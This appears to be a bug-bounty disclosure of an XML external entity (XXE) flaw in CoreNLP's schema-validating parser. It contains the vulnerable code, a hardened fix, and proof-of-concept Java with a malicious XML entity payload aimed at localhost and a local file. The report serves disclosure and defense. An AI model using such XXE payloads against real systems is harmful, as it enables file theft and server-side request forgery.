Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp

Valid

Reported on

Jan 15th 2022


Description

If a malicious schema XML file is passed to getValidatingXmlParser(), the method is vulnerable to XXE, because the SchemaFactory it uses resolves external entities while parsing that schema file.

Vulnerable code in XMLUtils.java (https://github.com/stanfordnlp/CoreNLP/blob/4c28eb5f5e44381b4157aa4fcab72e9231ce42b8/src/edu/stanford/nlp/util/XMLUtils.java#L304L305):

public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
    ...
    SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
    Schema schema = factory.newSchema(schemaFile);
    ...
}

The SchemaFactory is created without FEATURE_SECURE_PROCESSING set, so it is vulnerable to XXE when newSchema() parses schemaFile.
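A minimal sketch of a hardened variant, assuming the JDK's built-in JAXP implementation (Java 8 or later; a third-party Xerces on the classpath may reject the ACCESS_EXTERNAL_* properties). The class name HardenedXmlUtils is hypothetical and this is not the code of the linked patch: it turns on FEATURE_SECURE_PROCESSING and also sets ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to the empty string (no protocols allowed) on both the SchemaFactory and the DocumentBuilderFactory.

```java
import java.io.File;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.SAXException;

public class HardenedXmlUtils {

    // Hypothetical stand-in for XMLUtils.getValidatingXmlParser(File):
    // the schema file is parsed by a SchemaFactory that may not load
    // external DTDs, external entities, or imported/included schemas.
    public static DocumentBuilder getValidatingXmlParser(File schemaFile)
            throws SAXException, ParserConfigurationException {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Empty string = no protocol is allowed for external access.
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        Schema schema = factory.newSchema(schemaFile);

        // The documents validated against the schema need the same protection.
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        dbf.setSchema(schema);
        return dbf.newDocumentBuilder();
    }
}
```

Setting the two properties explicitly, rather than relying on FEATURE_SECURE_PROCESSING alone, should keep the restriction in place even if a system-wide JAXP setting would otherwise relax it. The trade-off is that schemas which legitimately use xs:include or xs:import will no longer load; those would need an allow-list such as "file" for ACCESS_EXTERNAL_SCHEMA instead of "".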

Proof of Concept

By default, SchemaFactory is vulnerable to XXE as shown by the example below:

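import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;

import java.io.File;

public class Poc {

    public static void main(String[] args) {
        try {
            // Default factory: FEATURE_SECURE_PROCESSING is not set explicitly,
            // so external entities declared in the schema document are resolved.
            SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            // Parsing poc.xml expands &xxe;, which makes the JVM send a request
            // to http://127.0.0.1/ (observable with any local HTTP listener).
            Schema schema = factory.newSchema(new File("poc.xml"));
        } catch (Exception e) {
            // poc.xml is not a valid XSD, so an exception is expected here;
            // the request to 127.0.0.1 is what demonstrates the XXE.
            e.printStackTrace();
        }
    }
}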

poc.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
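The proof of concept above needs an HTTP listener on 127.0.0.1 to observe the request. The sketch below is an offline variant with hypothetical names (OfflinePoc, maliciousSchema, accepts, hardenedFactory): the external entity points at a local temporary file and is referenced inside xs:documentation, so the document is still a valid schema after expansion. On a stock JDK the default factory should accept it (meaning the file was read), while a factory with ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA set to "" should reject it with a SAXException.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.SAXException;

public class OfflinePoc {

    // Hypothetical helper: an XSD whose DOCTYPE declares an external entity
    // pointing at entityUri and references it inside <xs:documentation>,
    // so the schema stays valid once the entity has been expanded.
    public static String maliciousSchema(String entityUri) {
        return "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE xs:schema [<!ENTITY xxe SYSTEM \"" + entityUri + "\">]>\n"
            + "<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n"
            + "  <xs:annotation><xs:documentation>&xxe;</xs:documentation></xs:annotation>\n"
            + "</xs:schema>\n";
    }

    // True if newSchema() accepted the document (the entity was resolved),
    // false if the factory refused it.
    public static boolean accepts(SchemaFactory factory, String schemaXml) {
        try {
            factory.newSchema(new StreamSource(new StringReader(schemaXml)));
            return true;
        } catch (SAXException e) {
            return false;
        }
    }

    // Same configuration as the vulnerable code in XMLUtils.
    public static SchemaFactory defaultFactory() {
        return SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
    }

    // Hypothetical hardened factory: no protocol allowed for external access.
    public static SchemaFactory hardenedFactory() throws SAXException {
        SchemaFactory factory = defaultFactory();
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory;
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("secret", ".txt");
        Files.write(secret, "top secret".getBytes(StandardCharsets.UTF_8));
        String xsd = maliciousSchema(secret.toUri().toString());
        System.out.println("default factory accepts:  " + accepts(defaultFactory(), xsd));
        System.out.println("hardened factory accepts: " + accepts(hardenedFactory(), xsd));
    }
}
```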

Patch

https://github.com/stanfordnlp/corenlp/compare/HEAD...haxatron:fix-xxe-2

Impact

This vulnerability allows XXE when a developer uses this function to validate XML files against a malicious schema file, for example making the application send requests to attacker-chosen URLs, as in the proof of concept.

stanfordnlp/corenlp maintainer validated this vulnerability.
haxatron has been awarded the disclosure bounty.
stanfordnlp/corenlp maintainer confirmed that a fix has been merged on 1940ff.
haxatron has been awarded the fix bounty.
stanfordnlp/corenlp maintainer: Thanks!
